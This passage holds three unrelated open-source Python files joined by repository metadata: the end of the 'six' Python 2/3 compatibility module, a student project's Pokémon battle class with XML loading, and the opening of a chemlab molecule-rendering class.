MAXSIZE = int((1 << 31) - 1)
else:
# 64-bit
MAXSIZE = int((1 << 63) - 1)
del X
def _add_doc(func, doc):
"""Add documentation to a function."""
func.__doc__ = doc
def _import_module(name):
"""Import module, returning the module after the last dot."""
__import__(name)
return sys.modules[name]
class _LazyDescr(object):
def __init__(self, name):
self.name = name
def __get__(self, obj, tp):
result = self._resolve()
setattr(obj, self.name, result) # Invokes __set__.
try:
# This is a bit ugly, but it avoids running this again by
# removing this descriptor.
delattr(obj.__class__, self.name)
except AttributeError:
pass
return result
class MovedModule(_LazyDescr):
def __init__(self, name, old, new=None):
super(MovedModule, self).__init__(name)
if PY3:
if new is None:
new = name
self.mod = new
else:
self.mod = old
def _resolve(self):
return _import_module(self.mod)
def __getattr__(self, attr):
_module = self._resolve()
value = getattr(_module, attr)
setattr(self, attr, value)
return value
class _LazyModule(types.ModuleType):
def __init__(self, name):
super(_LazyModule, self).__init__(name)
self.__doc__ = self.__class__.__doc__
def __dir__(self):
attrs = ["__doc__", "__name__"]
attrs += [attr.name for attr in self._moved_attributes]
return attrs
# Subclasses should override this
_moved_attributes = []
class MovedAttribute(_LazyDescr):
def __init__(self, name, old_mod, new_mod, old_attr=None, new_attr=None):
super(MovedAttribute, self).__init__(name)
if PY3:
if new_mod is None:
new_mod = name
self.mod = new_mod
if new_attr is None:
if old_attr is None:
new_attr = name
else:
new_attr = old_attr
self.attr = new_attr
else:
self.mod = old_mod
if old_attr is None:
old_attr = name
self.attr = old_attr
def _resolve(self):
module = _import_module(self.mod)
return getattr(module, self.attr)
class _SixMetaPathImporter(object):
"""
A meta path importer to import six.moves and its submodules.
This class implements a PEP302 finder and loader. It should be compatible
with Python 2.5 and all existing versions of Python3
"""
def __init__(self, six_module_name):
self.name = six_module_name
self.known_modules = {}
def _add_module(self, mod, *fullnames):
for fullname in fullnames:
self.known_modules[self.name + "." + fullname] = mod
def _get_module(self, fullname):
return self.known_modules[self.name + "." + fullname]
def find_module(self, fullname, path=None):
if fullname in self.known_modules:
return self
return None
def __get_module(self, fullname):
try:
return self.known_modules[fullname]
except KeyError:
raise ImportError("This loader does not know module " + fullname)
def load_module(self, fullname):
try:
# in case of a reload
return sys.modules[fullname]
except KeyError:
pass
mod = self.__get_module(fullname)
if isinstance(mod, MovedModule):
mod = mod._resolve()
else:
mod.__loader__ = self
sys.modules[fullname] = mod
return mod
def is_package(self, fullname):
"""
Return true, if the named module is a package.
We need this method to get correct spec objects with
Python 3.4 (see PEP451)
"""
return hasattr(self.__get_module(fullname), "__path__")
def get_code(self, fullname):
"""Return None
Required, if is_package is implemented"""
self.__get_module(fullname) # eventually raises ImportError
return None
get_source = get_code # same as get_code
_importer = _SixMetaPathImporter(__name__)
class _MovedItems(_LazyModule):
"""Lazy loading of moved objects"""
__path__ = [] # mark as package
_moved_attributes = [
MovedAttribute("cStringIO", "cStringIO", "io", "StringIO"),
MovedAttribute("filter", "itertools", "builtins", "ifilter", "filter"),
MovedAttribute("filterfalse", "itertools", "itertools", "ifilterfalse", "filterfalse"),
MovedAttribute("input", "__builtin__", "builtins", "raw_input", "input"),
MovedAttribute("intern", "__builtin__", "sys"),
MovedAttribute("map", "itertools", "builtins", "imap", "map"),
MovedAttribute("getcwd", "os", "os", "getcwdu", "getcwd"),
MovedAttribute("getcwdb", "os", "os", "getcwd", "getcwdb"),
MovedAttribute("range", "__builtin__", "builtins", "xrange", "range"),
MovedAttribute("reload_module", "__builtin__", "importlib" if PY34 else "imp", "reload"),
MovedAttribute("reduce", "__builtin__", "functools"),
MovedAttribute("shlex_quote", "pipes", "shlex", "quote"),
MovedAttribute("StringIO", "StringIO", "io"),
MovedAttribute("UserDict", "UserDict", "collections"),
MovedAttribute("UserList", "UserList", "collections"),
MovedAttribute("UserString", "UserString", "collections"),
MovedAttribute("xrange", "__builtin__", "builtins", "xrange", "range"),
MovedAttribute("zip", "itertools", "builtins", "izip", "zip"),
MovedAttribute("zip_longest", "itertools", "itertools", "izip_longest", "zip_longest"),
MovedModule("builtins", "__builtin__"),
MovedModule("configparser", "ConfigParser"),
MovedModule("copyreg", "copy_reg"),
MovedModule("dbm_gnu", "gdbm", "dbm.gnu"),
MovedModule("_dummy_thread", "dummy_thread", "_dummy_thread"),
MovedModule("http_cookiejar", "cookielib", "http.cookiejar"),
MovedModule("http_cookies", "Cookie", "http.cookies"),
MovedModule("html_entities", "htmlentitydefs", "html.entities"),
MovedModule("html_parser", "HTMLParser", "html.parser"),
MovedModule("http_client", "httplib", "http.client"),
MovedModule("email_mime_multipart", "email.MIMEMultipart", "email.mime.multipart"),
MovedModule("email_mime_nonmultipart", "email.MIMENonMultipart", "email.mime.nonmultipart"),
MovedModule("email_mime_text", "email.MIMEText", "email.mime.text"),
MovedModule("email_mime_base", "email.MIMEBase", "email.mime.base"),
MovedModule("BaseHTTPServer", "BaseHTTPServer", "http.server"),
MovedModule("CGIHTTPServer", "CGIHTTPServer", "http.server"),
MovedModule("SimpleHTTPServer", "SimpleHTTPServer", "http.server"),
MovedModule("cPickle", "cPickle", "pickle"),
MovedModule("queue", "Queue"),
MovedModule("reprlib", "repr"),
MovedModule("socketserver", "SocketServer"),
MovedModule("_thread", "thread", "_thread"),
MovedModule("tkinter", "Tkinter"),
MovedModule("tkinter_dialog", "Dialog", "tkinter.dialog"),
MovedModule("tkinter_filedialog", "FileDialog", "tkinter.filedialog"),
MovedModule("tkinter_scrolledtext", "ScrolledText", "tkinter.scrolledtext"),
MovedModule("tkinter_simpledialog", "SimpleDialog", "tkinter.simpledialog"),
MovedModule("tkinter_tix", "Tix", "tkinter.tix"),
MovedModule("tkinter_ttk", "ttk", "tkinter.ttk"),
MovedModule("tkinter_constants", "Tkconstants", "tkinter.constants"),
MovedModule("tkinter_dnd", "Tkdnd", "tkinter.dnd"),
MovedModule("tkinter_colorchooser", "tkColorChooser",
"tkinter.colorchooser"),
MovedModule("tkinter_commondialog", "tkCommonDialog",
"tkinter.commondialog"),
MovedModule("tkinter_tkfiledialog", "tkFileDialog", "tkinter.filedialog"),
MovedModule("tkinter_font", "tkFont", "tkinter.font"),
MovedModule("tkinter_messagebox", "tkMessageBox", "tkinter.messagebox"),
MovedModule("tkinter_tksimpledialog", "tkSimpleDialog",
"tkinter.simpledialog"),
MovedModule("urllib_parse", __name__ + ".moves.urllib_parse", "urllib.parse"),
MovedModule("urllib_error", __name__ + ".moves.urllib_error", "urllib.error"),
MovedModule("urllib", __name__ + ".moves.urllib", __name__ + ".moves.urllib"),
MovedModule("urllib_robotparser", "robotparser", "urllib.robotparser"),
MovedModule("xmlrpc_client", "xmlrpclib", "xmlrpc.client"),
MovedModule("xmlrpc_server", "SimpleXMLRPCServer", "xmlrpc.server"),
]
# Add windows specific modules.
if sys.platform == "win32":
_moved_attributes += [
MovedModule("winreg", "_winreg"),
]
for attr in _moved_attributes:
setattr(_MovedItems, attr.name, attr)
if isinstance(attr, MovedModule):
_importer._add_module(attr, "moves." + attr.name)
del attr
_MovedItems._moved_attributes = _moved_attributes
moves = _MovedItems(__name__ + ".moves")
_importer._add_module(moves, "moves")
class Module_six_moves_urllib_parse(_LazyModule):
"""Lazy loading of moved objects in six.moves.urllib_parse"""
_urllib_parse_moved_attributes = [
MovedAttribute("ParseResult", "urlparse", "urllib.parse"),
MovedAttribute("SplitResult", "urlparse", "urllib.parse"),
MovedAttribute("parse_qs", "urlparse", "urllib.parse"),
MovedAttribute("parse_qsl", "urlparse", "urllib.parse"),
MovedAttribute("urldefrag", "urlparse", "urllib.parse"),
MovedAttribute("urljoin", "urlparse", "urllib.parse"),
MovedAttribute("urlparse", "urlparse", "urllib.parse"),
MovedAttribute("urlsplit", "urlparse", "urllib.parse"),
MovedAttribute("urlunparse", "urlparse", "urllib.parse"),
MovedAttribute("urlunsplit", "urlparse", "urllib.parse"),
MovedAttribute("quote", "urllib", "urllib.parse"),
MovedAttribute("quote_plus", "urllib", "urllib.parse"),
MovedAttribute("unquote", "urllib", "urllib.parse"),
MovedAttribute("unquote_plus", "urllib", "urllib.parse"),
MovedAttribute("urlencode", "urllib", "urllib.parse"),
MovedAttribute("splitquery", "urllib", "urllib.parse"),
MovedAttribute("splittag", "urllib", "urllib.parse"),
MovedAttribute("splituser", "urllib", "urllib.parse"),
MovedAttribute("uses_fragment", "urlparse", "urllib.parse"),
MovedAttribute("uses_netloc", "urlparse", "urllib.parse"),
MovedAttribute("uses_params", "urlparse", "urllib.parse"),
MovedAttribute("uses_query", "urlparse", "urllib.parse"),
MovedAttribute("uses_relative", "urlparse", "urllib.parse"),
]
for attr in _urllib_parse_moved_attributes:
setattr(Module_six_moves_urllib_parse, attr.name, attr)
del attr
Module_six_moves_urllib_parse._moved_attributes = _urllib_parse_moved_attributes
_importer._add_module(Module_six_moves_urllib_parse(__name__ + ".moves.urllib_parse"),
"moves.urllib_parse", "moves.urllib.parse")
class Module_six_moves_urllib_error(_LazyModule):
"""Lazy loading of moved objects in six.moves.urllib_error"""
_urllib_error_moved_attributes = [
MovedAttribute("URLError", "urllib2", "urllib.error"),
MovedAttribute("HTTPError", "urllib2", "urllib.error"),
MovedAttribute("ContentTooShortError", "urllib", "urllib.error"),
]
for attr in _urllib_error_moved_attributes:
setattr(Module_six_moves_urllib_error, attr.name, attr)
del attr
Module_six_moves_urllib_error._moved_attributes = _urllib_error_moved_attributes
_importer._add_module(Module_six_moves_urllib_error(__name__ + ".moves.urllib.error"),
"moves.urllib_error", "moves.urllib.error")
class Module_six_moves_urllib_request(_LazyModule):
"""Lazy loading of moved objects in six.moves.urllib_request"""
_urllib_request_moved_attributes = [
MovedAttribute("urlopen", "urllib2", "urllib.request"),
MovedAttribute("install_opener", "urllib2", "urllib.request"),
MovedAttribute("build_opener", "urllib2", "urllib.request"),
MovedAttribute("pathname2url", "urllib", "urllib.request"),
MovedAttribute("url2pathname", "urllib", "urllib.request"),
MovedAttribute("getproxies", "urllib", "urllib.request"),
MovedAttribute("Request", "urllib2", "urllib.request"),
MovedAttribute("OpenerDirector", "urllib2", "urllib.request"),
MovedAttribute("HTTPDefaultErrorHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPRedirectHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPCookieProcessor", "urllib2", "urllib.request"),
MovedAttribute("ProxyHandler", "urllib2", "urllib.request"),
MovedAttribute("BaseHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPPasswordMgr", "urllib2", "urllib.request"),
MovedAttribute("HTTPPasswordMgrWithDefaultRealm", "urllib2", "urllib.request"),
MovedAttribute("AbstractBasicAuthHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPBasicAuthHandler", "urllib2", "urllib.request"),
MovedAttribute("ProxyBasicAuthHandler", "urllib2", "urllib.request"),
MovedAttribute("AbstractDigestAuthHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPDigestAuthHandler", "urllib2", "urllib.request"),
MovedAttribute("ProxyDigestAuthHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPSHandler", "urllib2", "urllib.request"),
MovedAttribute("FileHandler", "urllib2", "urllib.request"),
MovedAttribute("FTPHandler", "urllib2", "urllib.request"),
MovedAttribute("CacheFTPHandler", "urllib2", "urllib.request"),
MovedAttribute("UnknownHandler", "urllib2", "urllib.request"),
MovedAttribute("HTTPErrorProcessor", "urllib2", "urllib.request"),
MovedAttribute("urlretrieve", "urllib", "urllib.request"),
MovedAttribute("urlcleanup", "urllib", "urllib.request"),
MovedAttribute("URLopener", "urllib", "urllib.request"),
MovedAttribute("FancyURLopener", "urllib", "urllib.request"),
MovedAttribute("proxy_bypass", "urllib", "urllib.request"),
]
for attr in _urllib_request_moved_attributes:
setattr(Module_six_moves_urllib_request, attr.name, attr)
del attr
Module_six_moves_urllib_request._moved_attributes = _urllib_request_moved_attributes
_importer._add_module(Module_six_moves_urllib_request(__name__ + ".moves.urllib.request"),
"moves.urllib_request", "moves.urllib.request")
class Module_six_moves_urllib_response(_LazyModule):
"""Lazy loading of moved objects in six.moves.urllib_response"""
_urllib_response_moved_attributes = [
MovedAttribute("addbase", "urllib", "urllib.response"),
MovedAttribute("addclosehook", "urllib", "urllib.response"),
MovedAttribute("addinfo", "urllib", "urllib.response"),
MovedAttribute("addinfourl", "urllib", "urllib.response"),
]
for attr in _urllib_response_moved_attributes:
setattr(Module_six_moves_urllib_response, attr.name, attr)
del attr
Module_six_moves_urllib_response._moved_attributes = _urllib_response_moved_attributes
_importer._add_module(Module_six_moves_urllib_response(__name__ + ".moves.urllib.response"),
"moves.urllib_response", "moves.urllib.response")
class Module_six_moves_urllib_robotparser(_LazyModule):
"""Lazy loading of moved objects in six.moves.urllib_robotparser"""
_urllib_robotparser_moved_attributes = [
MovedAttribute("RobotFileParser", "robotparser", "urllib.robotparser"),
]
for attr in _urllib_robotparser_moved_attributes:
setattr(Module_six_moves_urllib_robotparser, attr.name, attr)
del attr
Module_six_moves_urllib_robotparser._moved_attributes = _urllib_robotparser_moved_attributes
_importer._add_module(Module_six_moves_urllib_robotparser(__name__ + ".moves.urllib.robotparser"),
"moves.urllib_robotparser", "moves.urllib.robotparser")
class Module_six_moves_urllib(types.ModuleType):
"""Create a six.moves.urllib namespace that resembles the Python 3 namespace"""
__path__ = [] # mark as package
parse = _importer._get_module("moves.urllib_parse")
error = _importer._get_module("moves.urllib_error")
request = _importer._get_module("moves.urllib_request")
response = _importer._get_module("moves.urllib_response")
robotparser = _importer._get_module("moves.urllib_robotparser")
def __dir__(self):
return ['parse', 'error', 'request', 'response', 'robotparser']
_importer._add_module(Module_six_moves_urllib(__name__ + ".moves.urllib"),
"moves.urllib")
def add_move(move):
"""Add an item to six.moves."""
setattr(_MovedItems, move.name, move)
def remove_move(name):
"""Remove item from six.moves."""
try:
delattr(_MovedItems, name)
except AttributeError:
try:
del moves.__dict__[name]
except KeyError:
raise AttributeError("no such move, %r" % (name,))
if PY3:
_meth_func = "__func__"
_meth_self = "__self__"
_func_closure = "__closure__"
_func_code = "__code__"
_func_defaults = "__defaults__"
_func_globals = "__globals__"
else:
_meth_func = "im_func"
_meth_self = "im_self"
_func_closure = "func_closure"
_func_code = "func_code"
_func_defaults = "func_defaults"
_func_globals = "func_globals"
try:
advance_iterator = next
except NameError:
def advance_iterator(it):
return it.next()
next = advance_iterator
try:
callable = callable
except NameError:
def callable(obj):
return any("__call__" in klass.__dict__ for klass in type(obj).__mro__)
if PY3:
def get_unbound_function(unbound):
return unbound
create_bound_method = types.MethodType
def create_unbound_method(func, cls):
return func
Iterator = object
else:
def get_unbound_function(unbound):
return unbound.im_func
def create_bound_method(func, obj):
return types.MethodType(func, obj, obj.__class__)
def create_unbound_method(func, cls):
return types.MethodType(func, None, cls)
class Iterator(object):
def next(self):
return type(self).__next__(self)
callable = callable
_add_doc(get_unbound_function,
"""Get the function out of a possibly unbound function""")
get_method_function = operator.attrgetter(_meth_func)
get_method_self = operator.attrgetter(_meth_self)
get_function_closure = operator.attrgetter(_func_closure)
get_function_code = operator.attrgetter(_func_code)
get_function_defaults = operator.attrgetter(_func_defaults)
get_function_globals = operator.attrgetter(_func_globals)
if PY3:
def iterkeys(d, **kw):
return iter(d.keys(**kw))
def itervalues(d, **kw):
return iter(d.values(**kw))
def iteritems(d, **kw):
return iter(d.items(**kw))
def iterlists(d, **kw):
return iter(d.lists(**kw))
viewkeys = operator.methodcaller("keys")
viewvalues = operator.methodcaller("values")
viewitems = operator.methodcaller("items")
else:
def iterkeys(d, **kw):
return d.iterkeys(**kw)
def itervalues(d, **kw):
return d.itervalues(**kw)
def iteritems(d, **kw):
return d.iteritems(**kw)
def iterlists(d, **kw):
return d.iterlists(**kw)
viewkeys = operator.methodcaller("viewkeys")
viewvalues = operator.methodcaller("viewvalues")
viewitems = operator.methodcaller("viewitems")
_add_doc(iterkeys, "Return an iterator over the keys of a dictionary.")
_add_doc(itervalues, "Return an iterator over the values of a dictionary.")
_add_doc(iteritems,
"Return an iterator over the (key, value) pairs of a dictionary.")
_add_doc(iterlists,
"Return an iterator over the (key, [values]) pairs of a dictionary.")
if PY3:
def b(s):
return s.encode("latin-1")
def u(s):
return s
unichr = chr
import struct
int2byte = struct.Struct(">B").pack
del struct
byte2int = operator.itemgetter(0)
indexbytes = operator.getitem
iterbytes = iter
import io
StringIO = io.StringIO
BytesIO = io.BytesIO
_assertCountEqual = "assertCountEqual"
if sys.version_info[1] <= 1:
_assertRaisesRegex = "assertRaisesRegexp"
_assertRegex = "assertRegexpMatches"
else:
_assertRaisesRegex = "assertRaisesRegex"
_assertRegex = "assertRegex"
else:
def b(s):
return s
# Workaround for standalone backslash
def u(s):
return unicode(s.replace(r'\\', r'\\\\'), "unicode_escape")
unichr = unichr
int2byte = chr
def byte2int(bs):
return ord(bs[0])
def indexbytes(buf, i):
return ord(buf[i])
iterbytes = functools.partial(itertools.imap, ord)
import StringIO
StringIO = BytesIO = StringIO.StringIO
_assertCountEqual = "assertItemsEqual"
_assertRaisesRegex = "assertRaisesRegexp"
_assertRegex = "assertRegexpMatches"
_add_doc(b, """Byte literal""")
_add_doc(u, """Text literal""")
def assertCountEqual(self, *args, **kwargs):
return getattr(self, _assertCountEqual)(*args, **kwargs)
def assertRaisesRegex(self, *args, **kwargs):
return getattr(self, _assertRaisesRegex)(*args, **kwargs)
def assertRegex(self, *args, **kwargs):
return getattr(self, _assertRegex)(*args, **kwargs)
if PY3:
exec_ = getattr(moves.builtins, "exec")
def reraise(tp, value, tb=None):
if value is None:
value = tp()
if value.__traceback__ is not tb:
raise value.with_traceback(tb)
raise value
else:
def exec_(_code_, _globs_=None, _locs_=None):
"""Execute code in a namespace."""
if _globs_ is None:
frame = sys._getframe(1)
_globs_ = frame.f_globals
if _locs_ is None:
_locs_ = frame.f_locals
del frame
elif _locs_ is None:
_locs_ = _globs_
exec("""exec _code_ in _globs_, _locs_""")
exec_("""def reraise(tp, value, tb=None):
raise tp, value, tb
""")
if sys.version_info[:2] == (3, 2):
exec_("""def raise_from(value, from_value):
if from_value is None:
raise value
raise value from from_value
""")
elif sys.version_info[:2] > (3, 2):
exec_("""def raise_from(value, from_value):
raise value from from_value
""")
else:
def raise_from(value, from_value):
raise value
print_ = getattr(moves.builtins, "print", None)
if print_ is None:
def print_(*args, **kwargs):
"""The new-style print function for Python 2.4 and 2.5."""
fp = kwargs.pop("file", sys.stdout)
if fp is None:
return
def write(data):
if not isinstance(data, basestring):
data = str(data)
# If the file has an encoding, encode unicode with it.
if (isinstance(fp, file) and
isinstance(data, unicode) and
fp.encoding is not None):
errors = getattr(fp, "errors", None)
if errors is None:
errors = "strict"
data = data.encode(fp.encoding, errors)
fp.write(data)
want_unicode = False
sep = kwargs.pop("sep", None)
if sep is not None:
if isinstance(sep, unicode):
want_unicode = True
elif not isinstance(sep, str):
raise TypeError("sep must be None or a string")
end = kwargs.pop("end", None)
if end is not None:
if isinstance(end, unicode):
want_unicode = True
elif not isinstance(end, str):
raise TypeError("end must be None or a string")
if kwargs:
raise TypeError("invalid keyword arguments to print()")
if not want_unicode:
for arg in args:
if isinstance(arg, unicode):
want_unicode = True
break
if want_unicode:
newline = unicode("\n")
space = unicode(" ")
else:
newline = "\n"
space = " "
if sep is None:
sep = space
if end is None:
end = newline
for i, arg in enumerate(args):
if i:
write(sep)
write(arg)
write(end)
if sys.version_info[:2] < (3, 3):
_print = print_
def print_(*args, **kwargs):
fp = kwargs.get("file", sys.stdout)
flush = kwargs.pop("flush", False)
_print(*args, **kwargs)
if flush and fp is not None:
fp.flush()
_add_doc(reraise, """Reraise an exception.""")
if sys.version_info[0:2] < (3, 4):
def wraps(wrapped, assigned=functools.WRAPPER_ASSIGNMENTS,
updated=functools.WRAPPER_UPDATES):
def wrapper(f):
f = functools.wraps(wrapped, assigned, updated)(f)
f.__wrapped__ = wrapped
return f
return wrapper
else:
wraps = functools.wraps
def with_metaclass(meta, *bases):
"""Create a base class with a metaclass."""
# This requires a bit of explanation: the basic idea is to make a dummy
# metaclass for one level of class instantiation that replaces itself with
# the actual metaclass.
class metaclass(meta):
def __new__(cls, name, this_bases, d):
return meta(name, bases, d)
return type.__new__(metaclass, 'temporary_class', (), {})
def add_metaclass(metaclass):
"""Class decorator for creating a class with a metaclass."""
def wrapper(cls):
orig_vars = cls.__dict__.copy()
slots = orig_vars.get('__slots__')
if slots is not None:
if isinstance(slots, str):
slots = [slots]
for slots_var in slots:
orig_vars.pop(slots_var)
orig_vars.pop('__dict__', None)
orig_vars.pop('__weakref__', None)
return metaclass(cls.__name__, cls.__bases__, orig_vars)
return wrapper
def python_2_unicode_compatible(klass):
"""
A decorator that defines __unicode__ and __str__ methods under Python 2.
Under Python 3 it does nothing.
To support Python 2 and 3 with a single code base, define a __str__ method
returning text and apply this decorator to the class.
"""
if PY2:
if '__str__' not in klass.__dict__:
raise ValueError("@python_2_unicode_compatible cannot be applied "
"to %s because it doesn't define __str__()." %
klass.__name__)
klass.__unicode__ = klass.__str__
klass.__str__ = lambda self: self.__unicode__().encode('utf-8')
return klass
# Complete the moves implementation.
# This code is at the end of this module to speed up module loading.
# Turn this module into a package.
__path__ = [] # required for PEP 302 and PEP 451
__package__ = __name__ # see PEP 366 @ReservedAssignment
if globals().get("__spec__") is not None:
__spec__.submodule_search_locations = [] # PEP 451 @UndefinedVariable
# Remove other six meta path importers, since they cause problems. This can
# happen if six is removed from sys.modules and then reloaded. (Setuptools does
# this for some reason.)
if sys.meta_path:
for i, importer in enumerate(sys.meta_path):
# Here's some real nastiness: Another "instance" of the six module might
# be floating around. Therefore, we can't use isinstance() to check for
# the six meta path importer, since the other six instance will have
# inserted an importer with different class.
if (type(importer).__name__ == "_SixMetaPathImporter" and
importer.name == __name__):
del sys.meta_path[i]
break
del i, importer
# Finally, add the importer to the meta path import hook.
sys.meta_path.append(_importer)
| mit |
andredalton/bcc | 2014/MAC0242/Projeto/pokemon/pokemon.py | 1 | 8640 | # Usado pra receber arquivos XML
import sys
# Usado para validar e manipular XML
from lxml import etree
from lxml.etree import XMLSyntaxError, Element, SubElement
# Os tipos foram ordenados em kind_list e kind_dict é utilizado para retornar o objeto através de um nome.
from .kind import kind_list, kind_dict, blank, bug, dragon,\
eletric, fighting, flying, fire, ghost,\
grass, ground, ice, normal, poison, psychic, rock, water
# Agora existe apenas o Attack e uma especialização para o Struggle
from .attack.attack import Attack
from .attack.struggle import Struggle
class Pokemon():
""" Pokemon."""
def __init__(self):
self.name = ""
self.level = 0
self.HP = 0
self.ATK = 0
self.DEF = 0
self.SPD = 0
self.SPC = 0
self.kinds = []
self.attacks = [Struggle(self), None, None, None, None]
self.nattack = 0
self.auto = False
self.auto_attack = None
def get_name(self):
return self.name
def get_level(self):
return self.level
def get_HP(self):
return self.HP
def get_ATK(self):
return self.ATK
def get_DEF(self):
return self.DEF
def get_SPC(self):
return self.SPC
def get_SPD(self):
return self.SPD
def get_kind(self, n):
return self.kinds[n]
def get_attack(self, n):
return self.attacks[n]
def get_damage(self, damage):
if self.HP < damage:
self.HP = 0
else:
self.HP -= int(damage)
def get_nattack(self):
return self.nattack
def set_auto(self):
self.auto = True
def get_auto(self):
return self.auto
def left_pp(self):
pp = 0
for i in range(1, 5):
if self.attacks[i] is not None:
pp += self.attacks[i].get_pp()
return pp
def select_attack(self, n):
if self.attacks[n] is not None:
if self.attacks[n].get_pp()>0:
return self.attacks[n]
else:
print("No PP left for this move!")
return None
def load_xml(self, pk):
""" Recebe um lxml.etree com um pokemon já validado e inicializa o objeto. """
if pk is None:
return None
atb = pk.find("attributes")
kinds = pk.findall("type")
attacks = pk.findall("attacks")
self.name = pk.find("name").text
self.level = int(pk.find("level").text)
self.HP = int(atb.find("health").text)
self.ATK = int(atb.find("attack").text)
self.DEF = int(atb.find("defense").text)
self.SPD = int(atb.find("speed").text)
self.SPC = int(atb.find("special").text)
for tp in pk.findall("type"):
try:
try:
self.kinds.append(kind_list[int(tp.text)])
except KeyError:
self.kinds.append(kind_dict["blank"])
except IndexError:
pass
if len(self.kinds)<2:
self.kinds.append(kind_dict["blank"])
for att in attacks:
ida = int(att.find("id").text)
namea = att.find("name").text
try:
tp = kind_list[int(att.find("type").text)]
except KeyError:
tp = kind_dict["blank"]
power = int(att.find("power").text)
acc = int(att.find("accuracy").text)
pp = int(att.find("power_points").text)
self.attacks[ida] = Attack(namea, tp, acc, power, pp, self)
self.nattack += 1
return True
def make_xml(self):
""" Método que gera um nó XML para este pokemon. """
pokemon = Element("pokemon")
name = SubElement(pokemon, 'name')
name.text = self.name
level = SubElement(pokemon, 'level')
level.text = str(self.level)
attributes = SubElement(pokemon, 'attributes')
health = SubElement(attributes, 'health')
health.text = str(self.HP)
attack = SubElement(attributes, 'attack')
attack.text = str(self.ATK)
defense = SubElement(attributes, 'defense')
defense.text = str(self.DEF)
speed = SubElement(attributes, 'speed')
speed.text = str(self.SPD)
special = SubElement(attributes, 'special')
special.text = str(self.SPC)
type1 = SubElement(pokemon, 'type')
type1.text = str(kind_list.index(self.kinds[0]))
if self.kinds[1] != blank and self.kinds[1] is not None:
type2 = SubElement(pokemon, 'type')
type2.text = str(kind_list.index(self.kinds[1]))
attacks = []
for i in range(4):
att = self.attacks[i+1]
if att is not None:
attacks.append({})
attacks[i]['top'] = SubElement(pokemon, 'attacks')
attacks[i]['id'] = SubElement(attacks[i]['top'], 'id')
attacks[i]['id'].text = str(i+1)
attacks[i]['name'] = SubElement(attacks[i]['top'], 'name')
attacks[i]['name'].text = str(att.get_name())
attacks[i]['type'] = SubElement(attacks[i]['top'], 'type')
attacks[i]['type'].text = str(kind_list.index(att.get_TYP()))
attacks[i]['power'] = SubElement(attacks[i]['top'], 'power')
attacks[i]['power'].text = str(att.get_PWR())
attacks[i]['accuracy'] = SubElement(attacks[i]['top'], 'accuracy')
attacks[i]['accuracy'].text = str(att.get_ACU())
attacks[i]['power_points'] = SubElement(attacks[i]['top'], 'power_points')
attacks[i]['power_points'].text = str(att.get_pp())
return pokemon
def load(self, f=sys.stdin):
self.name = f.readline().strip()
self.level = int(f.readline())
self.HP = int(f.readline())
self.ATK = int(f.readline())
self.DEF = int(f.readline())
self.SPD = int(f.readline())
self.SPC = int(f.readline())
tp1 = f.readline().strip().lower()
tp2 = f.readline().strip().lower()
try:
self.kinds.append(kind_dict[tp1])
except (KeyError):
self.kinds.append(kind_dict["blank"])
try:
self.kinds.append(kind_dict[tp2])
except (KeyError):
self.kinds.append(kind_dict["blank"])
self.nattack = int(f.readline())
if self.nattack > 4:
self.nattack = 4
for i in range(self.nattack):
nameh = f.readline().strip()
try:
tp = kind_dict[f.readline().strip().lower()]
except KeyError:
tp = kind_dict["blank"]
acc = int(f.readline())
power = int(f.readline())
pp = int(f.readline())
self.attacks[i+1] = Attack(nameh, tp, acc, power, pp, self)
def print_attack(self, ppm=None):
""" Método que imprime as opções de ataque deste pokemon. """
if self.left_pp() > 0:
for i in range(4):
a = self.attacks[i+1]
if a is None:
break
if ppm is not None:
params = {"n":i+1, "name":a.get_name(), "pp":a.get_pp(), "ppm":ppm[i+1]}
else:
params = {"n":i+1, "name":a.get_name(), "pp":a.get_pp(), "ppm":a.get_ppm()}
if a is not None:
print("%(n)d - %(name)s (%(pp)d/%(ppm)d)" % params)
return True
return False
def on_my_own(self, other):
"""
Método que calcula qual o melhor ataque para este pokémon contra o other.
É calculado apenas no ínicio da batalha.
"""
if self.auto_attack is None:
d = 0 # Dano
a = 0 # Numero do ataque
for i in range(1, self.nattack+1):
if self.attacks[i] is None:
break
if self.attacks[i].get_pp() == 0:
continue
self.attacks[i].prepare(other)
dt = 0 # Dano temporário
for j in range(1000):
dt += self.attacks[i].damage()
# Calculando o dano médio deste ataque levando em consideração a acurácia
dt *= self.attacks[i].get_ACU()/100000
if d < dt:
d = dt
a = i
self.auto_attack = a
return self.auto_attack | apache-2.0 |
moxon6/chemlab | build/lib/chemlab/mviewer/representations/ballandstick.py | 6 | 13485 | import numpy as np
import itertools
from .obsarray import obsarray as obsarray
from .state import SystemHiddenState, SystemSelectionState, ArrayState
from .state import Selection
from ...graphics.renderers import (SphereImpostorRenderer,
CylinderImpostorRenderer, AtomRenderer,
BondRenderer, BoxRenderer)
from ...graphics import colors
from ...graphics.pickers import SpherePicker, CylinderPicker
from ...db import ChemlabDB
from ...graphics.postprocessing import GlowEffect
from PyQt4 import QtCore
cdb = ChemlabDB()
vdw_radii = cdb.get('data', 'vdwdict')
elements = cdb.get('data', 'elements')
from ..events import Model, Event
class BallAndStickRepresentation(Model):
atom_clicked = Event()
bond_clicked = Event()
@property
def atom_colors(self):
return self.color_state
@atom_colors.setter
def atom_colors(self, value):
self.color_state.array = value
self.on_atom_colors_changed()
def on_atom_colors_changed(self):
self.atom_renderer.update_colors(self.color_state.array)
self.on_atom_selection_changed() # Hack
self.viewer.widget.update()
def __init__(self, viewer, system):
self._callbacks = {} # TODO: This is because the model class doesnt work
self.system = system
self.viewer = viewer
self.color_scheme = colors.default_atom_map
# Model classes
self.hidden_state = {'atoms': Selection([], system.n_atoms),
'bonds': Selection([], system.n_bonds),
'box': Selection([], 1)}
self.selection_state = {'atoms': Selection([], system.n_atoms),
'bonds': Selection([], system.n_bonds),
'box': Selection([], 1)}
self.color_state = ArrayState([colors.default_atom_map.get(t, colors.deep_pink) for t in system.type_array])
self.radii_state = ArrayState([vdw_radii.get(t) * 0.3 for t in system.type_array])
# Visualization classes
self.atom_renderer = self.viewer.add_renderer(SphereImpostorRenderer,
system.r_array,
self.radii_state.array,
self.color_state.array)
self.bond_renderer = self.viewer.add_renderer(BondRenderer,
system.bonds, system.r_array,
system.type_array, style='impostors')
